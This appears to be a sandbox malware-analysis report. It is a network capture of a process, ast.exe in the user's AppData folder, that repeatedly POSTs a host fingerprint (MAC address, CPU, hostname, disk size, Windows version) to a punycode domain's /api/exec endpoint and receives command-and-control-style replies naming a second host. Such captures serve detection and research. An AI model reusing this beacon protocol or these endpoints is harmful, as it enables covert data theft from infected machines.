                                                                                                                                2024-11-19 17:56:19 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.
                                                                                                                                2024-11-19 17:56:19 UTC403OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.19045) x64


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                6192.168.2.449905212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:20 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:20 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                7192.168.2.449913212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:21 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:21 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                8192.168.2.449940212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:24 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:24 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                9192.168.2.449948212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:25 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:25 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                10192.168.2.449956212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:26 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:26 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                11192.168.2.449964212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:27 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:27 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                12192.168.2.449972212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:28 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:28 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                13192.168.2.449980212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:29 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:29 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                14192.168.2.449989212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:30 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:30 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                15192.168.2.450001212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:31 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:31 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                16192.168.2.450007212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:31 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:31 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.
                                                                                                                                2024-11-19 17:56:32 UTC166INHTTP/1.1 200 OK
                                                                                                                                server: nginx/1.22.1
                                                                                                                                date: Tue, 19 Nov 2024 17:56:32 GMT
                                                                                                                                content-type: text/html
                                                                                                                                content-length: 98
                                                                                                                                cache-control: private
                                                                                                                                connection: close
                                                                                                                                2024-11-19 17:56:32 UTC98INData Raw: 01 13 00 00 62 00 00 00 00 00 00 00 00 00 00 00 13 11 99 08 d8 89 77 45 a4 51 a6 0f ef e8 f2 0b 9c ad 00 00 23 00 00 00 74 72 73 30 31 31 2e 78 6e 2d 2d 38 30 61 6b 69 63 6f 6b 63 30 61 61 62 6c 63 2e 78 6e 2d 2d 70 31 61 69 0b 00 00 00 31 34 32 20 31 30 34 20 36 30 33 00 00 00 00 00 00 00 00
                                                                                                                                Data Ascii: bwEQ#trs011.xn--80akicokc0aablc.xn--p1ai142 104 603


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                17192.168.2.450018212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:33 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 256
                                                                                                                                2024-11-19 17:56:33 UTC256OUTData Raw: 03 31 00 00 00 01 00 00 3a 00 00 00 da 34 58 d3 5d da 4c 41 8d 6c bc d2 a6 b1 8f 16 70 00 00 00 70 00 31 00 02 00 31 00 34 00 32 00 20 00 31 00 30 00 34 00 20 00 36 00 30 00 33 00 04 00 70 00 31 00 02 00 31 00 34 00 32 00 20 00 31 00 30 00 34 00 20 00 36 00 30 00 33 00 04 00 70 00 31 00 02 00 31 00 34 00 32 00 20 00 31 00 30 00 34 00 20 00 36 00 30 00 33 00 04 00 70 00 31 00 02 00 31 00 34 00 32 00 20 00 31 00 30 00 34 00 20 00 36 00 30 00 33 00 04 00 70 00 31 00 02 00 31 00 34 00 32 00 20 00 31 00 30 00 34 00 20 00 36 00 30 00 33 00 04 00 70 00 31 00 02 00 03 00 70 00 32 00 02 00 03 00 70 00 34 00 02 00 31 00 34 00 32 00 20 00 31 00 30 00 34 00 20 00 36 00 30 00 33 00 03 00 70 00 35 00 02 00 31 00 34 00 32 00 20 00 31 00 30 00 34 00 20 00 36 00 30 00 33
                                                                                                                                Data Ascii: 1:4X]LAlpp1142 104 603p1142 104 603p1142 104 603p1142 104 603p1142 104 603p1p2p4142 104 603p5142 104 603
                                                                                                                                2024-11-19 17:56:33 UTC390OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 256
                                                                                                                                1:vKlGnpp1142 104 603p1142 104 603p1142 104 603p1142 104 603p1142 104 603p1p2p4142 104 603p5142 104 603
                                                                                                                                2024-11-19 17:56:33 UTC390OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 256
                                                                                                                                1:I*K1pp1142 104 603p1142 104 603p1142 104 603p1142 104 603p1142 104 603p1p2p4142 104 603p5142 104 603
                                                                                                                                2024-11-19 17:56:33 UTC390OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 256
                                                                                                                                1:6otL?:pp1142 104 603p1142 104 603p1142 104 603p1142 104 603p1142 104 603p1p2p4142 104 603p5142 104 603
                                                                                                                                2024-11-19 17:56:33 UTC390OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 256
                                                                                                                                1:mF$~Wpp1142 104 603p1142 104 603p1142 104 603p1142 104 603p1142 104 603p1p2p4142 104 603p5142 104 603
                                                                                                                                2024-11-19 17:56:33 UTC168INHTTP/1.1 200 OK
                                                                                                                                server: nginx/1.22.1
                                                                                                                                date: Tue, 19 Nov 2024 17:56:33 GMT
                                                                                                                                content-type: text/html
                                                                                                                                content-length: 2078
                                                                                                                                cache-control: private
                                                                                                                                connection: close
                                                                                                                                2024-11-19 17:56:33 UTC2078INData Raw: 02 13 00 00 1e 08 00 00 3a 00 00 00 da 34 58 d3 5d da 4c 41 8d 6c bc d2 a6 b1 8f 16 00 00 00 00 05 00 00 00 04 00 04 00 04 00 04 00 04 00 f6 03 00 00 44 00 31 00 02 00 31 00 01 00 32 00 01 00 33 00 01 00 34 00 01 00 36 00 01 00 35 00 01 00 31 00 30 00 01 00 37 00 01 00 38 00 01 00 31 00 31 00 01 00 31 00 34 00 01 00 31 00 38 00 01 00 31 00 37 00 01 00 31 00 33 00 01 00 31 00 35 00 05 00 44 00 31 00 02 00 30 00 03 00 44 00 32 00 02 00 30 00 03 00 44 00 33 00 02 00 03 00 44 00 34 00 02 00 30 00 03 00 44 00 35 00 02 00 11 04 30 04 37 04 3e 04 32 04 30 04 4f 04 03 00 44 00 36 00 02 00 31 00 03 00 44 00 37 00 02 00 03 00 44 00 38 00 02 00 32 00 2c 00 31 00 2c 00 33 00 2c 00 34 00 2c 00 36 00 2c 00 35 00 2c 00 31 00 30 00 2c 00 37 00 2c 00 38 00 2c 00 33 00 30
                                                                                                                                Data Ascii: :4X]LAlD11234651078111418171315D10D20D3D40D507>20OD61D7D82,1,3,4,6,5,10,7,8,30


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                18192.168.2.450038212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:35 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
